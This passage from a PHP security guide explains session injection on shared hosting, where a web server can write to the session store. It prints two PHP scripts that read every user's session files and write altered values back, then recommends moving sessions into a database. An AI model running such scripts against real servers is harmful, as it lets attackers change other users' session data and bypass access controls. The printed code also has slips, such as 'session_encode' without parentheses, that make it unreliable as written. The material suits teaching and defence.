8.3. Session Injection
A similar concern to session exposure is session injection
. This type of attack leverages the fact that your web server has write access in addition to read access to the session data store. Therefore, a script can potentially allow other users to add, modify, or delete sessions. The following example displays an HTML form that allows users to conveniently modify existing session data:
<?php
session_start();
?>
<form action="inject.php" method="POST">
<?php
$path = ini_get('session.save_path');
$handle = dir($path);
while ($filename = $handle->read())
{
if (substr($filename, 0, 5) == 'sess_')
{
$sess_data = file_get_contents("$path/$filename");
if (!empty($sess_data))
{
session_decode($sess_data);
$sess_data = $_SESSION;
$_SESSION = array();
$sess_name = substr($filename, 5);
$sess_name = htmlentities($sess_name, ENT_QUOTES, 'UTF-8');
echo "<h1>Session [$sess_name]</h1>";
foreach ($sess_data as $name => $value)
{
$name = htmlentities($name, ENT_QUOTES, 'UTF-8');
$value = htmlentities($value, ENT_QUOTES, 'UTF-8');
echo "<p>
$name:
<input type=\"text\"
name=\"{$sess_name}[{$name}]\"
value=\"$value\" />
</p>";
}
echo '<br />';
}
}
}
$handle->close();
?>
<input type="submit" />
</form>
The inject.php script can perform the modifications indicated in the form:
<?php
session_start();
$path = ini_get('session.save_path');
foreach ($_POST as $sess_name => $sess_data)
{
$_SESSION = $sess_data;
$sess_data = session_encode;
file_put_contents("$path/$sess_name", $sess_data);
}
$_SESSION = array();
?>
This type of attack is very dangerous. An attacker can modify not only the session data of your users but also her own session data. This is more powerful than session hijacking because an attacker can choose the desired values of all session data, potentially bypassing access restrictions and other security safeguards.
The best solution to this problem is to store session data in a database. See the previous section for more information.
| 